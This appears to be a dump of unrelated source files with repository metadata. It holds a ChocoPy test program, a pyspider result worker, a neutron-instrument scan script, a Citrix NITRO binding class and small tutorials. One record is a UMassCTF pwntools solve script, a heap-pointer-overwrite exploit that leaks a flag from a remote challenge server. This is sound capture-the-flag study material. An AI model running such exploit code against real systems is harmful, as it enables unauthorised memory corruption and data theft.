x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar2(object):
p: bool = True
p2: bool = True
def baz(self:"bar2", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
        while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar2", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar3(object):
p: bool = True
p2: bool = True
p3: bool = True
def baz(self:"bar3", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar3", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar3", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar4(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
def baz(self:"bar4", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar4", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar4", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar4", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar5(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
p5: bool = True
def baz(self:"bar5", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar5", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar5", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz5(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int], xx5: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
x5:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
y5:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
def qux5(y: int, y2: int, y3: int, y4: int, y5: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
nonlocal x5
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
print(bar().baz([1,2]))
|
[
"[email protected]"
] | |
b28c119440b275211e9419c52249b7e15e69c698
|
bc371b9238956bc00cc33654b1d68651c6edf371
|
/writeups/2021/UMassCTF/suckless2/solve.py
|
3630e3e60dbe0df2ab62d7d4bc19878c0b703861
|
[
"MIT"
] |
permissive
|
welchbj/ctf
|
447202921fbf5c467af62b4f72f5f489c7c471f0
|
3b54769a8312f755eb97e7b4c954e4b5829af8e1
|
refs/heads/master
| 2023-08-19T03:28:33.264186 | 2023-08-11T18:38:17 | 2023-08-11T18:38:17 | 213,223,536 | 167 | 28 |
MIT
| 2023-04-18T13:29:33 | 2019-10-06T18:42:03 |
Python
|
UTF-8
|
Python
| false | false | 1,313 |
py
|
#!/usr/bin/env python3
from pwn import *
the_binary = "./suckless2_dist"
context.binary = the_binary
elf = context.binary
context.terminal = ["tmux", "splitw", "-h"]
def init_io():
if args.REMOTE:
io = remote("34.72.244.178", 8089)
elif args.STRACE:
io = process(["strace", "-o" ,"trace.txt", the_binary])
else:
io = process(the_binary)
if args.GDB:
gdb.attach(io, f"""
file {the_binary}
continue
""")
return io
class Const:
flag_base = 0x000000000042a3d0
def add(io, sz, content):
assert b"\n" not in content
io.sendlineafter("> ", "new")
io.sendlineafter("length: ", str(sz))
io.sendlineafter("note: ", content)
def leak_flag_part(offset):
io = init_io()
# Overwrite chunk next ptr for arbitrary write.
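    # The allocator here appears to hand out notes from a singly linked free
    # list: the 0x10-byte write below spills into the next chunk's pointer, so
    # the third allocation is served at `where`, giving a write-what-where.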
where = elf.sym.version
what = Const.flag_base + offset
add(io, 1, b"A"*0x10 + p64(where))
add(io, 1, b"X")
add(io, 1, p64(what))
io.sendlineafter("> ", "version")
io.recvuntil("this is ")
return io.recvuntil("\n", drop=True).decode()
def main():
flag = ""
while "}" not in flag:
flag += leak_flag_part(offset=len(flag))
log.info(f"Flag: {flag}")
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
3229ce4468a1c5c8b08a986d4b43e85efce87457
|
8ee12ccce396e0d43bd8473ec9f0a13c9c7844c7
|
/Mani_Vijay/python buit-in functions/Pyhton input function/bool_float.py
|
77d81ecffdff469beceee0ce86e6e8be72d0b89a
|
[] |
no_license
|
Purushotamprasai/Python
|
4ed44e26ca5cec7bb39c5561f545bfc68499bcfd
|
ed6fbd0f73cc7be91661f544f464222030197097
|
refs/heads/master
| 2023-06-05T13:39:04.602783 | 2020-01-23T14:30:25 | 2020-01-23T14:30:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 118 |
py
|
num= input("enter some data")
num= bool(num)
print"num is",num
print"id is", type(num)
print"type is", type(num)
|
[
"[email protected]"
] | |
9cf1edebac26b014d06bb74d8579bc2d35c8a658
|
8e24e8bba2dd476f9fe612226d24891ef81429b7
|
/geeksforgeeks/python/python_all/68_8.py
|
8d459b58026c87bc4d0809ae531ada70dcad3ea6
|
[] |
no_license
|
qmnguyenw/python_py4e
|
fb56c6dc91c49149031a11ca52c9037dc80d5dcf
|
84f37412bd43a3b357a17df9ff8811eba16bba6e
|
refs/heads/master
| 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,806 |
py
|
How to Get the Coordinate of the Screen in Python Turtle?
Turtle is a special feature of Python which provides a graphics library. In
this article we will learn how to get the coordinate of a mouse click on the
screen in Python Turtle. Turtle has many built-in functions; to create this
program we use the following:
> **import turtle ->** imports the Python library which gives us access to
> the turtle module.
>
> **Turtle() ->** this method is used to make a turtle object.
>
> **onscreenclick(functionname, 1) ->** a turtle function which sends the
> clicked coordinate to the given function; 1 is for left click and 3 is for
> right click.
>
> **speed() ->** increases or decreases the speed of the turtle pointer.
>
> **listen() ->** gives the turtle window focus so it can receive the click
> events.
>
> **done() ->** holds the screen open.
## Python3
# turtle library
import turtle
# This makes a turtle object
tess = turtle.Turtle()
# self defined function to print coordinate
def buttonclick(x,y):
print("You clicked at this coordinate({0},{1})".format(x,y))
#onscreen function to send coordinate
turtle.onscreenclick(buttonclick,1)
turtle.listen() # give the window focus so it receives click events
turtle.speed(10) # set the speed
turtle.done() # hold the screen
### **Output:**
(Screenshot omitted.) Clicking inside the turtle window prints the clicked
coordinate in the form `You clicked at this coordinate(x,y)`.
|
[
"[email protected]"
] | |
9c32a0e4932286ee4c8d66addc4f77cfc63023fb
|
919e3e3d772d6a79e7639bde32bf698088bc241f
|
/pyspider/result/result_worker.py
|
ddfd7545d8dc0fc20273f9cb2192499ca363bee4
|
[
"Apache-2.0"
] |
permissive
|
UoToGK/crawler-pyspider
|
96cfee1e16db1376b5ea0c5fa51650a04c14f714
|
29ba13905c73081097df9ef646a5c8194eb024be
|
refs/heads/master
| 2023-09-05T18:33:17.470385 | 2021-11-05T10:44:15 | 2021-11-05T10:44:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,619 |
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<[email protected]>
# http://binux.me
# Created on 2014-10-19 15:37:46
import time
import json
import logging
from six.moves import queue as Queue
from pyspider.helper.logging import task_log
logger = logging.getLogger("result")
class ResultWorker(object):
"""
    Process each result coming off the queue.
    Override this class if needed.
"""
def __init__(self, resultdb, inqueue):
self.resultdb = resultdb
self.inqueue = inqueue
self._quit = False
def on_result(self, task, result):
        '''Called for every result'''
        task_log(task, 'on result')
if not result:
return
if 'taskid' in task and 'project' in task and 'url' in task:
logger.info('result %s:%s %s -> %.30r' % (
task['project'], task['taskid'], task['url'], result))
return self.resultdb.save(
project=task['project'],
taskid=task['taskid'],
url=task['url'],
result=result
)
else:
            logger.warning('result UNKNOWN -> %.30r' % result)
return
def quit(self):
self._quit = True
def run(self):
'''Run loop'''
logger.info("result_worker starting...")
while not self._quit:
try:
task, result = self.inqueue.get(timeout=1)
self.on_result(task, result)
            except Queue.Empty:
continue
except KeyboardInterrupt:
break
except AssertionError as e:
logger.error(e)
continue
except Exception as e:
logger.exception(e)
continue
logger.info("result_worker exiting...")
class OneResultWorker(ResultWorker):
'''Result Worker for one mode, write results to stdout'''
def on_result(self, task, result):
'''Called every result'''
if not result:
return
if 'taskid' in task and 'project' in task and 'url' in task:
logger.info('result %s:%s %s -> %.30r' % (
task['project'], task['taskid'], task['url'], result))
print(json.dumps({
'taskid': task['taskid'],
'project': task['project'],
'url': task['url'],
'result': result,
'updatetime': time.time()
}))
else:
            logger.warning('result UNKNOWN -> %.30r' % result)
return
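

# Usage sketch (not part of pyspider itself): drive OneResultWorker with an
# in-memory queue. OneResultWorker writes to stdout, so no resultdb is needed.
if __name__ == '__main__':
    q = Queue.Queue()
    q.put(({'taskid': 't1', 'project': 'demo', 'url': 'http://example.com/'},
           {'title': 'hello'}))
    worker = OneResultWorker(resultdb=None, inqueue=q)
    worker.on_result(*q.get())  # prints the result as one JSON line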
|
[
"[email protected]"
] | |
71e40389f60fb122edde1239c65f8e55412083f9
|
9d7d69178c6f1f1db6ed6767e0af32bfe836549c
|
/new_workspace/Gumtree_Workspace/Magnet/Yick/P9363/100 Alignment/20210130/Overnight/2021_Jan_Yick_scan_time_56_1K_125Oe_ZFC_40min.py
|
9cf66fe21d2297a88318f687b3e726608073a945
|
[] |
no_license
|
Gumtree/Quokka_scripts
|
217958288b59adbdaf00a9a13ece42f169003889
|
c9687d963552023d7408a8530005a99aabea1697
|
refs/heads/master
| 2023-08-30T20:47:32.142903 | 2023-08-18T03:38:09 | 2023-08-18T03:38:09 | 8,191,387 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,299 |
py
|
histmem preset 60
histmem mode time
#Time scan
#-----------------------------------------------------------------
#System reset (15 minutes)
hset /sample/tc1/control/tolerance1 1
drive ma1_setpoint 0
drive tc1_driveable 90
wait 10
drive tc1_driveable 4
drive ma1_setpoint 125
wait 10
hset /sample/tc1/control/tolerance1 0.2
drive tc1_driveable 50
# drive tc1_driveable 52
drive tc1_driveable 54
# drive tc1_driveable 54
drive tc1_driveable 55.5
hset /sample/tc1/control/tolerance1 0.1
drive tc1_driveable 56.1
wait 10
#-----------------------------------------------------------------
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 10 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 20 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 30 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 40 minutes
|
[
"[email protected]"
] | |
df954ffd8fb22a7384f0c0b74354af4e06877fbd
|
ba3231b25c60b73ca504cd788efa40d92cf9c037
|
/nitro-python-13.0.36/nssrc/com/citrix/netscaler/nitro/resource/config/vpn/vpnglobal_auditnslogpolicy_binding.py
|
c1cabb6314b245dc9c55e206d4e52a73885a3693
|
[
"Apache-2.0",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
zhuweigh/vpx13
|
f6d559ae85341e56472e3592cbc67062dac34b93
|
b36caa3729d3ca5515fa725f2d91aeaabdb2daa9
|
refs/heads/master
| 2020-07-04T22:15:16.595728 | 2019-09-20T00:19:56 | 2019-09-20T00:19:56 | 202,435,307 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,299 |
py
|
#
# Copyright (c) 2008-2019 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class vpnglobal_auditnslogpolicy_binding(base_resource) :
""" Binding class showing the auditnslogpolicy that can be bound to vpnglobal.
"""
def __init__(self) :
self._policyname = None
self._priority = None
self._secondary = None
self._groupextraction = None
self._gotopriorityexpression = None
self._feature = None
self.___count = None
@property
def priority(self) :
r"""Integer specifying the policy's priority. The lower the priority number, the higher the policy's priority. Maximum value for default syntax policies is 2147483647 and for classic policies is 64000.<br/>Minimum value = 0<br/>Maximum value = 2147483647.
"""
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
r"""Integer specifying the policy's priority. The lower the priority number, the higher the policy's priority. Maximum value for default syntax policies is 2147483647 and for classic policies is 64000.<br/>Minimum value = 0<br/>Maximum value = 2147483647
"""
try :
self._priority = priority
except Exception as e:
raise e
@property
def policyname(self) :
r"""The name of the policy.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
r"""The name of the policy.
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def feature(self) :
r"""The feature to be checked while applying this config.
"""
try :
return self._feature
except Exception as e:
raise e
@feature.setter
def feature(self, feature) :
r"""The feature to be checked while applying this config.
"""
try :
self._feature = feature
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
r"""Applicable only to advance vpn session policy. An expression or other value specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@gotopriorityexpression.setter
def gotopriorityexpression(self, gotopriorityexpression) :
r"""Applicable only to advance vpn session policy. An expression or other value specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
self._gotopriorityexpression = gotopriorityexpression
except Exception as e:
raise e
@property
def secondary(self) :
r"""Bind the authentication policy as the secondary policy to use in a two-factor configuration. A user must then authenticate not only to a primary authentication server but also to a secondary authentication server. User groups are aggregated across both authentication servers. The user name must be exactly the same on both authentication servers, but the authentication servers can require different passwords.
"""
try :
return self._secondary
except Exception as e:
raise e
@secondary.setter
def secondary(self, secondary) :
r"""Bind the authentication policy as the secondary policy to use in a two-factor configuration. A user must then authenticate not only to a primary authentication server but also to a secondary authentication server. User groups are aggregated across both authentication servers. The user name must be exactly the same on both authentication servers, but the authentication servers can require different passwords.
"""
try :
self._secondary = secondary
except Exception as e:
raise e
@property
def groupextraction(self) :
r"""Bind the Authentication policy to a tertiary chain which will be used only for group extraction. The user will not authenticate against this server, and this will only be called it primary and/or secondary authentication has succeeded.
"""
try :
return self._groupextraction
except Exception as e:
raise e
@groupextraction.setter
def groupextraction(self, groupextraction) :
r"""Bind the Authentication policy to a tertiary chain which will be used only for group extraction. The user will not authenticate against this server, and this will only be called it primary and/or secondary authentication has succeeded.
"""
try :
self._groupextraction = groupextraction
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(vpnglobal_auditnslogpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.vpnglobal_auditnslogpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
return 0
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = vpnglobal_auditnslogpolicy_binding()
updateresource.policyname = resource.policyname
updateresource.priority = resource.priority
updateresource.secondary = resource.secondary
updateresource.groupextraction = resource.groupextraction
updateresource.gotopriorityexpression = resource.gotopriorityexpression
updateresource.feature = resource.feature
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [vpnglobal_auditnslogpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].policyname = resource[i].policyname
updateresources[i].priority = resource[i].priority
updateresources[i].secondary = resource[i].secondary
updateresources[i].groupextraction = resource[i].groupextraction
updateresources[i].gotopriorityexpression = resource[i].gotopriorityexpression
updateresources[i].feature = resource[i].feature
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = vpnglobal_auditnslogpolicy_binding()
deleteresource.policyname = resource.policyname
deleteresource.secondary = resource.secondary
deleteresource.groupextraction = resource.groupextraction
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [vpnglobal_auditnslogpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].policyname = resource[i].policyname
deleteresources[i].secondary = resource[i].secondary
deleteresources[i].groupextraction = resource[i].groupextraction
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service) :
r""" Use this API to fetch a vpnglobal_auditnslogpolicy_binding resources.
"""
try :
obj = vpnglobal_auditnslogpolicy_binding()
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, filter_) :
r""" Use this API to fetch filtered set of vpnglobal_auditnslogpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = vpnglobal_auditnslogpolicy_binding()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service) :
r""" Use this API to count vpnglobal_auditnslogpolicy_binding resources configued on NetScaler.
"""
try :
obj = vpnglobal_auditnslogpolicy_binding()
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, filter_) :
r""" Use this API to count the filtered set of vpnglobal_auditnslogpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = vpnglobal_auditnslogpolicy_binding()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Crlcheck:
Mandatory = "Mandatory"
Optional = "Optional"
class Feature:
WL = "WL"
WebLogging = "WebLogging"
SP = "SP"
SurgeProtection = "SurgeProtection"
LB = "LB"
LoadBalancing = "LoadBalancing"
CS = "CS"
ContentSwitching = "ContentSwitching"
CR = "CR"
CacheRedirection = "CacheRedirection"
SC = "SC"
SureConnect = "SureConnect"
CMP = "CMP"
CMPcntl = "CMPcntl"
CompressionControl = "CompressionControl"
PQ = "PQ"
PriorityQueuing = "PriorityQueuing"
HDOSP = "HDOSP"
HttpDoSProtection = "HttpDoSProtection"
SSLVPN = "SSLVPN"
AAA = "AAA"
GSLB = "GSLB"
GlobalServerLoadBalancing = "GlobalServerLoadBalancing"
SSL = "SSL"
SSLOffload = "SSLOffload"
SSLOffloading = "SSLOffloading"
CF = "CF"
ContentFiltering = "ContentFiltering"
IC = "IC"
IntegratedCaching = "IntegratedCaching"
OSPF = "OSPF"
OSPFRouting = "OSPFRouting"
RIP = "RIP"
RIPRouting = "RIPRouting"
BGP = "BGP"
BGPRouting = "BGPRouting"
REWRITE = "REWRITE"
IPv6PT = "IPv6PT"
IPv6protocoltranslation = "IPv6protocoltranslation"
AppFw = "AppFw"
ApplicationFirewall = "ApplicationFirewall"
RESPONDER = "RESPONDER"
HTMLInjection = "HTMLInjection"
push = "push"
NSPush = "NSPush"
NetScalerPush = "NetScalerPush"
AppFlow = "AppFlow"
CloudBridge = "CloudBridge"
ISIS = "ISIS"
ISISRouting = "ISISRouting"
CH = "CH"
CallHome = "CallHome"
AppQoE = "AppQoE"
ContentAccelerator = "ContentAccelerator"
SYSTEM = "SYSTEM"
RISE = "RISE"
FEO = "FEO"
LSN = "LSN"
LargeScaleNAT = "LargeScaleNAT"
RDPProxy = "RDPProxy"
Rep = "Rep"
Reputation = "Reputation"
URLFiltering = "URLFiltering"
VideoOptimization = "VideoOptimization"
ForwardProxy = "ForwardProxy"
SSLInterception = "SSLInterception"
AdaptiveTCP = "AdaptiveTCP"
CQA = "CQA"
CI = "CI"
ContentInspection = "ContentInspection"
class Ocspcheck:
Mandatory = "Mandatory"
Optional = "Optional"
class Staaddresstype:
IPV4 = "IPV4"
IPV6 = "IPV6"
class vpnglobal_auditnslogpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.vpnglobal_auditnslogpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.vpnglobal_auditnslogpolicy_binding = [vpnglobal_auditnslogpolicy_binding() for _ in range(length)]
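

# Usage sketch (not part of the generated SDK): list all global nslog policy
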